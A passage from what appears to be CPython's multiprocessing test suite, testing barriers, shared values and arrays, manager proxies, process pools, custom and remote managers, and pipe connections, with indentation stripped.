test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
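# Tracks the number of live instances; test_release_task_refs checks that
# the pool releases its references to task arguments and results.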
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
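# Yields integers but raises SayWhenError once `when` is reached (or
# immediately if when == -1); used to exercise error handling in map()/imap().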
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError raised at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError raised at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError raised at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
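# Helpers for the error-callback tests: raising() raises a KeyError,
# unpickleable_result() returns a lambda that cannot be pickled.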
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
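# Proxy exposing only __next__ so that the baz() generator can be iterated
# remotely through the manager.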
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
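# Module-level queue served by QueueManager via get_queue() so that it can
# be reached from another process.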
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
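# Child helper: echo every bytes message back on the connection until the
# SENTINEL (empty byte string) is received.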
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
